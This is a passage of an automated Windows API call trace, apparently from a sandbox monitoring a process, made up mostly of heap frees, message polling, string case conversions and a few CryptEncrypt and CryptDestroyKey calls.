lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.595] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0199.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34df3f0 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.600] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x168c3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x168c8) returned 1 [0199.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.600] CharLowerBuffW (in: lpsz="byte[92360]", cchLength=0xb | out: lpsz="byte[92360]") returned 0xb [0199.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.601] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.601] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.601] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.601] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.601] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.601] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.601] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34df3f0*, pdwDataLen=0x8bef68*=0x168c3, dwBufLen=0x168c8 | out: pbData=0x34df3f0*, pdwDataLen=0x8bef68*=0x168c8) returned 1 [0199.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.604] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.604] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.604] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.605] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.605] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.605] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.605] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.605] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.605] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.605] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.605] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.605] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.605] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.605] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.605] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.606] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.606] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.606] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.606] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.613] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.613] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.613] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.617] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.617] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.617] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0199.617] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.617] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0199.617] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.617] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.617] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.617] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.618] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.618] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.618] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.618] CryptDestroyKey (hKey=0xaa5820) returned 1 [0199.618] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.618] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.618] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.618] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.618] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.618] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.619] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.619] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.619] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.619] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.619] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.619] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.619] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.619] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.619] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.619] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.619] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.619] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.620] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.620] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.620] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.620] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.620] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.620] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.621] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.621] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.621] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.621] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.621] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.621] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.621] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.621] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.621] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.621] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.621] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.622] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.622] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.622] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.622] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.622] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.622] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.622] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.622] PeekMessageW (in: 